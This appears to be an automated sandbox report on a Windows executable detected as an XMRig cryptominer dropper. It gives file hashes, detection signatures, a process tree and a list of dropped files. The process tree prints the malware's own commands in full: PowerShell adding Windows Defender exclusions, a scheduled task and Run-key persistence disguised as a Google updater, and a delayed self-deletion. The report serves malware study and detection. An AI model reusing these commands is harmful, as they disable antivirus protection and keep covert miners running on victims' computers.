Resubmissions
16/01/2024, 20:08
240116-yw2hnahhck 1024/12/2023, 12:16
231224-pfpz9abhcp 1028/08/2023, 15:19
230828-sqmvesca87 1026/08/2023, 15:20
230826-sqz5radd21 1020/08/2023, 00:19
230820-amltvacg48 1020/08/2023, 00:19
230820-amkxjscg46 1020/08/2023, 00:18
230820-al4y2aec9v 1020/08/2023, 00:18
230820-al4m9scg45 1020/08/2023, 00:18
230820-al32qscg44 1020/08/2023, 00:18
230820-al3e7sec9t 10Analysis
-
max time kernel
1801s -
max time network
1799s -
platform
windows10-2004_x64 -
resource
win10v2004-20230703-en -
resource tags
-
submitted
20/08/2023, 00:18
General
-
Target
TTVw7dDmSpz5mwee.exe
-
Size
2.0MB
-
MD5
a16a669a09bf158058b83e04e69fe38e
-
SHA1
f6c94763850d9e590d86057139e8895a7aacdeea
-
SHA256
cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
-
SHA512
658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
SSDEEP
49152:rWVipAxqo5p88CbXuxWQiSJU320ZW21Q0YWAij64ane6szjmL/45:rxAEcp9ueXit9WAQ0YWuO
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 9 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 30 IoCs
-
Executes dropped EXE 1 IoCs
-
UPX packed file 31 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Drops file in System32 directory 6 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 4 IoCs
-
Program crash 1 IoCs
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 8 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\TTVw7dDmSpz5mwee.exe"C:\Users\Admin\AppData\Local\Temp\TTVw7dDmSpz5mwee.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\TTVw7dDmSpz5mwee.exe"2⤵
- Suspicious use of WriteProcessMemory
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#glbtb#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "GoogleUpdateTaskMachineQC" } Else { "C:\Program Files\Google\Chrome\updater.exe" }2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn GoogleUpdateTaskMachineQC3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wokgfo#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 3836 -s 24883⤵
- Program crash
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor3⤵
- Detects videocard installed
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe qtdiqnkejoz2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe coygkprqxpklmnvz 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPooFst8AJlNjZc1TvSyIQTKz3bkbADxizSwgp6IHJKg4enmph7iNmIeAYcJJRGkawcinVbrMdr45fHmW9ZqCrw3dSLKVMKzrI2u4sgGlTj0G1RmIYUpqYq+tIjGyNap0si+Bl1xh/1o3aGmtmdST7PlUgkYz6ci8qWCk/Icfx3DrSi2oQaBV3Dr68Ysn/4ifK09AI9K4Wz/J2kKABX44SMSz/klz2Q+FtxUOLuLpB0ApMJVvTxUIOnUHLATPgLq86uJLXtnMRoz90CklrR3X6ggj+Qodet1aWyPnFIog0clkH9Lt1wIn/XNs6NZ/3bJg2NyJ2xuvDRy+oOBgUebKWiz2⤵
-
-
C:\Windows\System32\choice.exechoice /C Y /N /D Y /T 31⤵
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"2⤵
- Drops file in Program Files directory
-
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 420 -p 3836 -ip 38361⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p1⤵
- Drops file in System32 directory
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k UnistackSvcGroup1⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2.0MB
MD5a16a669a09bf158058b83e04e69fe38e
SHA1f6c94763850d9e590d86057139e8895a7aacdeea
SHA256cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
SHA512658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
Filesize
2.0MB
MD5a16a669a09bf158058b83e04e69fe38e
SHA1f6c94763850d9e590d86057139e8895a7aacdeea
SHA256cacc0261ccf7578ef5c1f9fdbe35705ad91070d020a4225e05cbf71a6103ac8e
SHA512658b52ad1d27becee5b5bbd443d43da38b88d49880e72c8cb843f176a2d84d571b39c34dbc7cfb7ea56acc548acc5b68cce47a8bcf9d173feec031f7e33a09c6
-
Filesize
226B
MD5fdba80d4081c28c65e32fff246dc46cb
SHA174f809dedd1fc46a3a63ac9904c80f0b817b3686
SHA256b9a385645ec2edddbc88b01e6b21362c14e9d7895712e67d375874eb7308e398
SHA512b24a6784443c85bb56f8ae401ad4553c0955f587671ec7960bda737901d677d5e15d1a47d3674505fc98ea09ede2e5078a0aeb4481d3728e6715f3eac557cd29
-
Filesize
2KB
MD5440cb38dbee06645cc8b74d51f6e5f71
SHA1d7e61da91dc4502e9ae83281b88c1e48584edb7c
SHA2568ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe
SHA5123aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6
-
Filesize
944B
MD549b5b4f67b3f0802547d0031f712a811
SHA1b5b4c4c9994369fbf17d6cb27204cfc41ebc1b2c
SHA25653ce5e42f6b723c183d4d0c0ac02a81de2c0804411dfd50c241d42dd48b6bb4a
SHA512e803da177b93af61541d2de0ea6b97decc8411d0eea34567e16eefab9bb3fa1af4c8a4fd793bbed29dde2c282bc005fcddcf716fb9764a2d83cdaac78e499527
-
Filesize
1KB
MD5ac149c2c1569109fedc4e6cc196f4c7c
SHA189a9c5e0f3b8e042076de3fd889d2c7f60ed446c
SHA25649feaf1af47b918958fbee268b1a7c1e9a66691a1c378c094bdfa99e00d7fa68
SHA512a1e4048e57c31b90d3da006b4d0e22d595cd541815cf3cea6fb7122391b4d3cef5372edd4c95564d964882fe4575a435179536b600a94156865fc8168723e856
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
14KB
MD5c01eaa0bdcd7c30a42bbb35a9acbf574
SHA10aee3e1b873e41d040f1991819d0027b6cc68f54
SHA25632297224427103aa1834dba276bf5d49cd5dd6bda0291422e47ad0d0706c6d40
SHA512d26ff775ad39425933cd3df92209faa53ec5b701e65bfbcccc64ce8dd3e79f619a9bad7cc975a98a95f2006ae89e50551877fc315a3050e48d5ab89e0802e2b7
-
Filesize
29KB
MD572c2da0f795ef1c1b9a77db3c115b581
SHA1a5afe24491dd0eed7b74d59284a0e603195dcbaf
SHA256cb5f2286ee5de98a5fbd048a3194b8616d02355863ea6b97b60a22892d626c72
SHA51227838b2343047dc8089f7daa6a4a2f11bb29a521e6b61abfae061c3e97b9373a6eb68cdd2f5351f925d8e0f7655eb380b73aff03d85f50c7946179ded0d91c72
-
Filesize
29KB
MD565076d2c378b3d9011bdc8f51e08c54b
SHA1d6da62486ff67d532058ef7ace17271c80a42c11
SHA256460837b187e2c6976ac5b50cf6fe35edfdc03053fc58b72c5737baaf0439add1
SHA512c129bcb055d3d2818ff7a54011def3ffcb67c5c11871022003f9e793e22d8f196c86e12e51192c3b04a5ab4994d554c8c8565f05908627ca5b54f7ed70e1f578
-
Filesize
29KB
MD50e53a020b4f18570a3a68768752a5fff
SHA1d5f9ce4911a124954c1d218761ee02ac301b7fc4
SHA2560b4bf9462ea915155ab7759cf7e992cc75c9c0fcc519b8edae009ce8998dbb25
SHA5129e6cf47bad5a73f9987c4371943d70103c5f6f84eb5c41f5fe0e60c5388aed9b932b1c7b86bc4999ed2499a583ec8f40578782ecd5b53bb77270e06bbcb076ae
-
Filesize
29KB
MD54802d2969e63d776bafc7da162cd281c
SHA1a842714e7683fefd70e5bdab6568fda4a4217e7e
SHA25670ae9bec9c6beac6943b90ad5b7e50e020cb581cd05dd183fd1d915fa8d14af7
SHA512fd83c83407d634db9cff5f4a3bbd79d5784d8617ad07cec4c40975c5d59b167802a3369c5635142b2120f2fe9e7b0e5d4ef71626ea7c0fcecec68b7a88f63fba
-
Filesize
29KB
MD538a6330c2c8e8a64ada9ca7679400605
SHA18cd2ce1344981ca5df43dc111e4176942426bf31
SHA25684fab81ca5627bac65b76b3048f006e36c8208c9fed6aa82b8491a148a96122f
SHA5126e75dcd81f04ff9e2c7c765dac3de022c5efaa7035ad3dd818e358c53e41ae512fd0813aeeb6529318d72baacddb031504d7bb62b5d354ea6a27621ae34fd672
-
Filesize
29KB
MD53ddcd41e03e2d900eb4aa2e4eb0f68ab
SHA12e2a1e753492d0d46d7ab68b897e5a97ee047f4d
SHA256521036c1b84073621d0f31282956efee1d567466fcd198636095d40e7416869e
SHA5126677a6940f14a4e4a3474c5b86069cdc23ebfb9ab7a728cdaab729e680d8c22fcb5f1bc7ad15c7e0ea8ca5513f127ad59977c1eecd6d6853c8f748777f7137a9
-
Filesize
29KB
MD5b428c0d4475089bbab54ede6c1f9c2b8
SHA1cecffa2337e7095b492d282e28157d8ca379afd5
SHA256c7f2d435cab9532859eda87b80c66e6504c80a648872f2e8094d415b04e7681a
SHA5128895310bc7ca5d8d0b44b786e1ef5faf6fd2a7b2228debdecd5ad10fec2b0864d6cb5db0f683e4ccca644e3ea2915b0217f076ae998ebfada702eec51462fa19
-
Filesize
4KB
MD5bdb25c22d14ec917e30faf353826c5de
SHA16c2feb9cea9237bc28842ebf2fea68b3bd7ad190
SHA256e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
SHA512b5eddbfd4748298a302e2963cfd12d849130b6dcb8f0f85a2a623caed0ff9bd88f4ec726f646dbebfca4964adc35f882ec205113920cb546cc08193739d6728c
-
Filesize
1KB
MD5b42c70c1dbf0d1d477ec86902db9e986
SHA11d1c0a670748b3d10bee8272e5d67a4fabefd31f
SHA2568ed3b348989cdc967d1fc0e887b2a2f5a656680d8d14ebd3cb71a10c2f55867a
SHA51257fb278a8b2e83d01fac2a031c90e0e2bd5e4c1a360cfa4308490eb07e1b9d265b1f28399d0f10b141a6438ba92dd5f9ce4f18530ec277fece0eb7678041cbc5
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
88KB
-
Filesize
88KB
-
Filesize
2.1MB
-
Filesize
2.1MB
-
Filesize
8.0MB
-
Filesize
128KB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
128KB
-
Filesize
256KB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
128KB
-
Filesize
8.0MB
-
Filesize
8.0MB
-
Filesize
128KB
-
Filesize
128KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
2.1MB
-
Filesize
2.1MB
-
Filesize
2.1MB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
10.8MB
-
Filesize
32KB
-
Filesize
64KB
-
Filesize
112KB
-
Filesize
40KB
-
Filesize
112KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
40KB
-
Filesize
10.8MB
-
Filesize
104KB
-
Filesize
24KB
-
Filesize
40KB
-
Filesize
64KB
-
Filesize
10.8MB